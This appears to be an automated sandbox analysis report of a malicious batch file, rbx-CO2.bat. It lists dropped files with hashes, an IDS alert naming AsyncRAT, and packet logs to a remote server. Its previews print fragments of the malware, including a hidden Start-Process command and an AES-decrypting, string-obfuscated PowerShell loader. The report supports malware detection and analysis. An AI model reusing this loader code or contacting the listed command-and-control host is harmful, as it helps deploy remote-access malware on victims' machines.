                                        Preview:ElfChnk.....................................8!..."......................................................................................................................l...=...........................................................................................................................f...............?...........................m...................M...F...........................................a...&...................................................................................9...............**..@...........O. W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.3101945749546235
                                        Encrypted:false
                                        SSDEEP:384:GhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVAViVhcVSVsVX6:GyjbP
                                        MD5:FFD7548AA8B73513E37AC74F7FC499B7
                                        SHA1:7BAF52151B91BDFA56D12285A88E0AF2BBDA1AD0
                                        SHA-256:418A17FEDA3FCB510EBA4F33A7D7ADDF1DC4FF23E09460BA2E41D92E01393F31
                                        SHA-512:A4BDC043871F8BFC002912A12FB7453CB0EB451F6D35DCE88726B45805F69E0C08999AA83F569826E30520B17935F372D283E94261D0B284850FE8A07618E3D0
                                        Malicious:false
                                        Preview:ElfChnk.........$...............$...........(;...<.....R....................................................................$A.g................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................&*..........v.......................................................................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.303784953285182
                                        Encrypted:false
                                        SSDEEP:384:UhxBwBuBwBOXBwByXyBwB6BwBLBwB6BwB6BwBEBwB01BwBfw/D7BwBL/iBwBfCbU:UvuCbCHDMgBWuh
                                        MD5:C2A65A94493082684E64DB6E56C72D0F
                                        SHA1:0AF5B9ABB145130AED2C257628ACF41D159444B8
                                        SHA-256:2E7E891CF8FB13F7A2D4B446268AB6D3C79A1624198483503142E6744FBA5F73
                                        SHA-512:074848A696EFE337064BFDAECEB148EBF3F9AE7AED32C2C8F7BD84B721E7D164EB9329FE613BF6985BCF5A2336089078970E78C119B09A571F1D007F76FE8FDE
                                        Malicious:false
                                        Preview:ElfChnk.....................................hL...O..%..X....................................................................e..............................................=...........................................................................................................................f...............?...........................m...................M...F....................".......)......................................................................................................................**..(............-.1W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.415502860476199
                                        Encrypted:false
                                        SSDEEP:384:/hNUEuUEdeUEFUEWUEbUEGUE7eUEt9UE8oUEbPUETaUEEpUESEUED7UEhmUEGlUi:/2qgYE
                                        MD5:7750FCF3463E4684F5956C8EF6545615
                                        SHA1:673F0508FDFE69CBABABDFDC29133640FA81051E
                                        SHA-256:FA412F1DA2F16D58A180E41D4793F4AF3512803C93E3DDA457305473F1CBF2FF
                                        SHA-512:6AE0FE662EEFD4ED26D6C40F742706AF38F3D448A92C23DE2986F11D3C7890DA6B5235C716085EA07E048548C429A4E91FE5F2DD422D1B03CCF0EC403E2156FC
                                        Malicious:false
                                        Preview:ElfChnk......................................Z...[......................................................................................................................F...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**................z W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Security.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):69864
                                        Entropy (8bit):4.331852611016058
                                        Encrypted:false
                                        SSDEEP:768:AGeu3t54aP9IJyS8TWGeu3t5Mjy167tbiikqokbE8noJp2g5d5zq:/lC
                                        MD5:70113D102FC5345FC8EE4CB6A3279A96
                                        SHA1:FD88172CD5A40D9ED5415E8E08635785B0A8B2F3
                                        SHA-256:EA1D758DAE4C58330699FF69C57C2B6330EF7208965DA92278C513CDB1009C9B
                                        SHA-512:0A07EA3104A31BC43D247070F0329E3EDB56C5610EDEBF6EB20236A038BC6810447631CEA65A8C02734FF81E5A6EF40684A9BB07033840472B7805EF4DC74EB6
                                        Malicious:false
                                        Preview:ElfChnk.................x...................h9...;.....v....................................................................z..n................p...s...h...................=...................................................N...............................................w.......:.......................3...................................a...........).......M...X...:...............................I...........N.......................................................&...........................................**.................f...........Z7;N...............................................................F.............!....6.......... ....f.......MCK.O.t2....v.................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.A.u.d.i.t.i.n.g.%..TxT.I..>;.(..S.e.c.u.r.i.t.y....w"B........................N...........................................$.N......e.n.g.i.n.e.e.r...E.N.G.I.N.E.E.R.-.P.C...D.......M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.0.2.c.c.f.u.f.o.j.l.p.n.e.t.q.g....

                                        C:\Windows\System32\winevt\Logs\System.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.730236132667886
                                        Encrypted:false
                                        SSDEEP:384:CFR1b1BbJuZbgQVl7VrFWXrE5krYnm5DDhw7ww55JkK6FEGSgLawBD3gKCJcGmyg:kXid/x5kd253pW5Yp5aC+6/lXZuuluO
                                        MD5:8209E6F994DD7BFCDF531E4E8C7C662D
                                        SHA1:78F133C6CA51608D2EFCE9E00B60EA2A1EBE1A9B
                                        SHA-256:BF3F81A0542761AC59B96390D2BA412C86525C8BB68F36CA6FB4BF467E4E3D37
                                        SHA-512:DA919CC293E67038C74799878CA536CB8A7B7EF4222579F259E1459A8B981FA2CFB61BB7BE1778A90EAF4A1D52A0F81D458B72EDBDE7B6F8F8C2976D2907308D
                                        Malicious:false
                                        Preview:ElfChnk.............................................d..]....................................................................$.4.................z...s...h...................=...................................................N...............................................w.......6.......................K...................................]...........).......M...9...:...........................................V...........................S...................................$...................&...............**..@.............WD..............&.............gX..L.&..A.......A..5...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....^...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                        C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):205656
                                        Entropy (8bit):3.767194516212821
                                        Encrypted:false
                                        SSDEEP:6144:h3OiW3OiB3Oin3Oi73Oie3OiW3OiB3Oin3Oi73OiO3OiW3OiB3Oin3Oi73Oip:Q
                                        MD5:0FFF3D6BAB92BB4BD06E4886D0CAF1FE
                                        SHA1:2A2AC1CB9B8F0F441BB02C7F8B9944633B7E7C1A
                                        SHA-256:CDF5CB95A013DC766F8D20DDBD2DEAC8240CB8D4B0116FFF743ECB1315E6AB03
                                        SHA-512:45E71A84EDA1A66BAF417D71D3468EB292F1701D16101DC80DD50BE071BB01D7915477332752D0822236581F42A3BE98107818F06509BD521ECBA34664366D36
                                        Malicious:false
                                        Preview:ElfChnk.....................................@......._.......................................................................X.............................................=..........................................................................................................................._...............8...........................f...................M...c...........................t...................................................................&...................................................**..x3...........5Kk...........*{-&........*{-.elRN.E%.,+.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

                                        C:\Windows\Temp\__PSScriptPolicyTest_1tzynuwf.osi.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\Temp\__PSScriptPolicyTest_f4o4oimb.n1j.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\appcompat\Programs\Amcache.hve

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.469606957218248
                                        Encrypted:false
                                        SSDEEP:6144:SzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNwjDH5S:0ZHtYZWOKnMM6bFp+j4
                                        MD5:5C3F749BBD3B6A0C85E548749041CEB9
                                        SHA1:6CD11C385D7D7FED885D26FC4669EE03EA6A06A2
                                        SHA-256:57FB8FD589ABB2F1522AE7BAD0A410DB6E290F2DA6917F0022D34262F65CA010
                                        SHA-512:5D2D71739E1B0FA3D3806E860569C270C5C82F642B5B09A3B8FDE7B4B30DF9171B4166CD0A1AD1C9AEDB6C77DF740D6C05F0678CECD20A2597B6ED56A01B8FB8
                                        Malicious:false
                                        Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..LM..................................................................................................................................................................................................................................................................................................................................................Zy........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        \Device\ConDrv

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):85
                                        Entropy (8bit):4.84935141926561
                                        Encrypted:false
                                        SSDEEP:3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
                                        MD5:D8C4F9FD5B972AE487170EA993933179
                                        SHA1:32E61F1DD8A462CEDC6B7A636275363B011ABDA9
                                        SHA-256:728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
                                        SHA-512:1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
                                        Malicious:false
                                        Preview:Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..

                                        \Device\Null

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (2695), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2842
                                        Entropy (8bit):5.268015847851952
                                        Encrypted:false
                                        SSDEEP:48:9JFHDRBXRG8R4YRxyKB3k4B3KX9zS3FXBvY595f8bLb8MS91ccCwMqu1whc9pWiM:PFHDRtVt7vBpB6a5xY595f8bus3wMVd2
                                        MD5:9CC1C2B55FAB8BD000AAD5A08F2019F8
                                        SHA1:5F440F6A9D6E88A8CF27C6806F8889667B09E9A6
                                        SHA-256:F22B3303843BB1C6793AD334D24DBD6CB7B9531836A2F9B4ACBB6262A3BCC885
                                        SHA-512:975BB4E81F089B545F45C49D94D0C78156B14A8FA10C8965B8FCEB335D3BF09569548B0B4F41F0DAF98C1209EF50C0C096D0EAE7F1689461D434C4ABFFC55A8A
                                        Malicious:false
                                        Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function Rgueq($eXEDy){.$HKJEc=[System.Security.Cryptography.Aes]::Create();.$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ=');.$HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA==');.$HipTi=$HKJEc.CreateDecryptor();.$ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length);.$HipTi.Dispose();.$HKJEc.Dispose();.$ioqgE;}function qVeuI($eXEDy){.Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', '');.Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblckt

                                        Static File Info

                                        General

                                        File type:ASCII text, with very long lines (5674), with CRLF line terminators
                                        Entropy (8bit):6.008704485108026
                                        TrID:
                                          File name:rbx-CO2.bat
                                          File size:5'214'429 bytes
                                          MD5:d1324a085a54c035d136f7a73edec440
                                          SHA1:3049e422f937395d1d64e205ce5978182d3c2388
                                          SHA256:6a25d0ca74a29596a0c09f26acbe9f85a46d5c1c886a6860dc915d94ffbbbe5a
                                          SHA512:0d43b7711a86a6c04dda27555037dc5e459a5aad4fe719e0d03b2d37cf3b8274e9a0417d089135e9abc3d6232f2bf7264781b5a8b7988058c13bc0c794027cbc
                                          SSDEEP:49152:BYFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:r
                                          TLSH:4436120B1D54ECBECDA50DAEE95A2F0FF432BE57F02909B6611B05BD07781E104D9A3A
                                          File Content Preview:Aecho off..%^%A%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJq

                                          File Icon

                                          Icon Hash:9686878b929a9886

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-10-03T14:54:46.061887+02002035595ET MALWARE Generic AsyncRAT Style SSL Cert1154.216.20.1326969192.168.2.659172TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 3, 2024 14:54:44.376554966 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:44.383065939 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:44.383156061 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:44.393441916 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:44.420083046 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:46.061584949 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:46.061608076 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:46.061666012 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:46.061887026 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:46.061929941 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:46.062189102 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:46.062223911 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:46.062804937 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:46.063071966 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:46.064805031 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:46.069664001 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:46.272224903 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:46.324009895 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:46.433005095 CEST59173443192.168.2.6147.135.36.89
                                          Oct 3, 2024 14:54:46.433047056 CEST44359173147.135.36.89192.168.2.6
                                          Oct 3, 2024 14:54:46.433177948 CEST59173443192.168.2.6147.135.36.89
                                          Oct 3, 2024 14:54:46.436111927 CEST59173443192.168.2.6147.135.36.89
                                          Oct 3, 2024 14:54:46.436134100 CEST44359173147.135.36.89192.168.2.6
                                          Oct 3, 2024 14:54:47.334980965 CEST44359173147.135.36.89192.168.2.6
                                          Oct 3, 2024 14:54:47.335107088 CEST59173443192.168.2.6147.135.36.89
                                          Oct 3, 2024 14:54:47.338654041 CEST59173443192.168.2.6147.135.36.89
                                          Oct 3, 2024 14:54:47.338671923 CEST44359173147.135.36.89192.168.2.6
                                          Oct 3, 2024 14:54:47.339190960 CEST44359173147.135.36.89192.168.2.6
                                          Oct 3, 2024 14:54:47.343328953 CEST59173443192.168.2.6147.135.36.89
                                          Oct 3, 2024 14:54:47.387414932 CEST44359173147.135.36.89192.168.2.6
                                          Oct 3, 2024 14:54:47.578969955 CEST44359173147.135.36.89192.168.2.6
                                          Oct 3, 2024 14:54:47.579144955 CEST44359173147.135.36.89192.168.2.6
                                          Oct 3, 2024 14:54:47.579325914 CEST59173443192.168.2.6147.135.36.89
                                          Oct 3, 2024 14:54:47.647700071 CEST59173443192.168.2.6147.135.36.89
                                          Oct 3, 2024 14:54:47.817766905 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:47.838105917 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:47.838260889 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:47.853101015 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:48.213129997 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:48.261557102 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:48.399955988 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:48.449027061 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:53.086011887 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:53.136550903 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:53.234055996 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:53.238888025 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:53.244369030 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:53.245670080 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:53.250598907 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.182183981 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.230294943 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.412175894 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.413000107 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.413050890 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.527923107 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.528033018 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.532829046 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.533072948 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.533077955 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.533082962 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.533118963 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.533123970 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.533149004 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.533149004 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.533212900 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.533396006 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.533401012 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.533416033 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.533468008 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.533502102 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.535115004 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.537648916 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.537817955 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.538026094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.538029909 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.538039923 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.538044930 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.538117886 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.538146019 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.538248062 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.538264036 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.538340092 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.538496017 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.538501024 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.538559914 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.538597107 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.540229082 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.540246010 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.540319920 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.542649031 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.542723894 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.543045044 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.543287992 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.543479919 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:54.543663025 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.543668032 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.543677092 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.543780088 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.545146942 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.545485973 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.545490026 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.545499086 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.545564890 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.545578003 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.545581102 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.545588017 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.547694921 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.548146963 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.548151970 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.548155069 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.548373938 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.548419952 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.548424006 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.548533916 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.548542976 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.548547029 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:54.548556089 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.065604925 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.105281115 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:55.214844942 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.261595964 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:55.285343885 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:55.285479069 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:55.290231943 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.290359974 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.290369987 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.290435076 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.290443897 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.290452957 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.290503025 CEST696959172154.216.20.132192.168.2.6
